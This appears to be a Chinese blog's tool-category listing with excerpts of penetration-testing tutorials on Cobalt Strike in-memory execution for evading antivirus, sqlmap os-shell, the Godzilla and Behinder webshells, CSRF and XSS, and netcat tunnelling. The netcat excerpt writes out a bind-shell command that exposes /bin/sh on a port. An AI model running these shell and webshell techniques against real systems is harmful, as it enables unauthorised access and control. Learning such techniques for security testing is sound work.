工具
文章平均质量分 56
番茄酱料
本博客只是自己用来不断学习积累的一个记录
展开
-
cobaltstrike之execute-assembly内存加载—后渗透利用
通过execute-assembly内存加载来执行文件,从而避免后渗透中被杀毒软件静态报毒,使更多的工具能够继续利用,常见的方式有权限维持,代理上线等操作。原创 2024-09-24 16:35:05 · 450 阅读 · 0 评论 -
CS反制之批量伪装上线
CS反制之批量伪装上线原创 2023-02-10 01:21:08 · 816 阅读 · 0 评论 -
Certutil工具(Windows命令行下载常用)
Certutil包含一个编码参数(编码)。这有助于在Base64中编码文件的内容。这是在Windows中等效于Linux中的base64命令。不能打开.exe可执行文件时候,可以使用certutil对可执行文件进行编码。然后传输编码后的数据,然后在接收机上对其进行解码。这里创建一个名为test.txt的文本文件,输入一些内容,打开powershell命令:Add-Content test.txt “ni hao”编码(base64)原创 2021-05-28 10:03:21 · 35837 阅读 · 1 评论 -
关于sublime text 2编译提示error2的解决办法
主要还是新编译系统配置出错了!!!1.首先确保自己需要编译的语言的路径添加到环境变量中(用户变量的path和系统变量的path都需要)2.在sublime text 2中编译新的系统,对应网上的编译脚本写入,保存在sublime text 2的data目录下3.Crtl+B进行编译,此时会有报错这里需要注意的点是这里当编译了新编译系统的文件时,路径配置是可能错误的,因此需要我们再次找到该文件,将路径更改成我们的路径再次Crtl+B可以看到成功编译...原创 2021-03-26 10:14:05 · 558 阅读 · 0 评论 -
Sqlmap的getshell使用(--os-shell)
环境:sqli-lab靶场+phpstudy。原创 2021-03-16 17:31:37 · 10079 阅读 · 2 评论 -
sqlmap高级用法
一.批量化扫描burp的请求日志1.打开burp配置项,进行如下修改记录所有的request请求,保存在sqlmap目录下的sql.txt中2.设置浏览器burp代理,访问测试url,查看sql.txt3.sqlmap对sql.txt进行扫描命令:sqlmap.py -l sql.txt --batch -smartbatch:会自动选择yessmart:启发式快速判断,节约时间结果将导出到C盘下的sqlmap目录下的output目录二.批量扫描文本中的多个目标1.在文本中写入要原创 2021-03-16 15:09:03 · 2712 阅读 · 2 评论 -
FOFA语法
1.title=”beijing” 从标题中搜索“北京”2.header=”thinkphp” 从http响应头中搜索“thinkphp”3.body=”管理后台” 从html正文中搜索“管理后台”4.domain=”163.com” 从子域名中搜索带有“163.com”的网站5.icon_hash=”-247388890” 搜索使用此icon的资产6.host=”.gov.cn”原创 2021-03-07 15:11:38 · 7004 阅读 · 4 评论 -
哥斯拉Webshell
一.启动命令:java -jar Godzilla-V2.96.jar启动时同目录会生成data.db数据库存放数据启动成功界面如下二.使用(在本机实测)这里演示jsp文件进行连接(需要提前配置好jsp环境)1.点击管理->生成这里默认密码,密钥(也可以更改,只要跟连接时候保持一致即可)接下来将生成的文件存放在Tomcat目录下,注意是在Tomcat–>webapps–>ROOT目录下可以打开指定路径,此时生成的shell.jsp已经生成接下来点击目标—&原创 2021-03-03 20:11:11 · 5674 阅读 · 4 评论 -
冰蝎使用
一.启动Windows环境下:1.配置环境:冰蝎只支持jre6-jre8可以在电脑上查看java版本命令:java -version2.启动在冰蝎目录下命令行输入命令:java -jar Behinder_v3.0_Beta6_win.jar(这里文件名可简化)即可开启Linux环境下:注意切换jdk版本6-8,对应javac版本也要和java版本相同,同理打开冰蝎目录输入命令二.使用(在本机进行实测)环境:phpStudy+冰蝎通过启动phpStudy,访问本机地址成功访原创 2021-03-03 10:52:17 · 17527 阅读 · 0 评论 -
WPS中宏功能开启
推荐链接:https://jingyan.baidu.com/article/d3b74d64f791171f76e6096b.html安装vba6.msi成功截图:宏成功启用:如果仍然无法启动,需要更改其安全级别:原创 2021-01-31 20:55:07 · 334 阅读 · 0 评论 -
CSRF与XSS的组合拳演示
一.存储型XSS与CSRF(在存储型xss中加入CSRF)1.配置代理2.打开CSRFTester工具3.抓取流量注意:Form Parameters需要将左面的两行复制过去可修改,第二个红箭头的勾选最好去掉,因为有时候自动生成的poc不能用,需要做一些更改,最后点击Generate HTML进行保存至自定义目录下,名称csrf5.html4.查看代码把容易被人发现的代码去掉将两个圈的地方去掉,将红箭头那两行必须value值相等更改完成一半,还需要一句更改密码CSRF代码成功原创 2020-12-14 20:05:06 · 1665 阅读 · 0 评论 -
使用burp生成CSRF的POC验证CSRF
实验环境:phpstudy, DVWA,burpsuite演示过程:<1>使用burp代理提交内容(代理推荐使用FoxyProxy小插件)<2>burp中寻找CSRF POC自动化生成选项<3>可以看到如下为自动化生成POC自动化编写有时候有些是不能用的,最好是自己改一些<4>将HTML代码复制到新建的csrf.html中<5>将其打开<6>点击请求可以看到成功改变密码。这种方式虽然成功了,但是必须跟原创 2020-12-14 18:47:37 · 2972 阅读 · 0 评论 -
内网中使用netcat进行正向和反向获取shell
本次演示在linux环境下一般用外网机器对内网机器进行访问时,多用反向shell,内网机器与内网机器之间多用正向shell正向shell由于内网及其属于边界服务器,因此我们先进行正向shell演示(正向shell是在目标机器上进行监听):内网机器上命令:nc -lvp 4444 -e /bin/sh本地机器上命令:nc 10.0.78.41 4444显示已经连接进行验证:说明正向连接成功反向shell反向shell是在本地vps上进行监听,目标机器进行连接本地机器上命令:nc -l原创 2020-12-07 16:49:25 · 3501 阅读 · 0 评论 -
内网传输层隧道的Netcat使用演示
Netcat简称nc,瑞士军刀,功能十分强大,使用tcp/udp协议将一端的数据传输到另一端。Netcat有Windows和linux版本,Kali里面是默认安装的,如果没有需要手动下载。Netcat命令介绍:-c 进入shell模式-e该参数后面跟一个可执行程序名称,当一个连接建立时,该程序将被运行-b允许广播-g <网关>设置路由器跳跃通信网关,最多可设置8个-G <指向器数目>设置来源路由指向器,其数值为4的倍数-h帮助目录-i 延迟秒数-k在套接字上设置k原创 2020-12-07 15:20:13 · 533 阅读 · 0 评论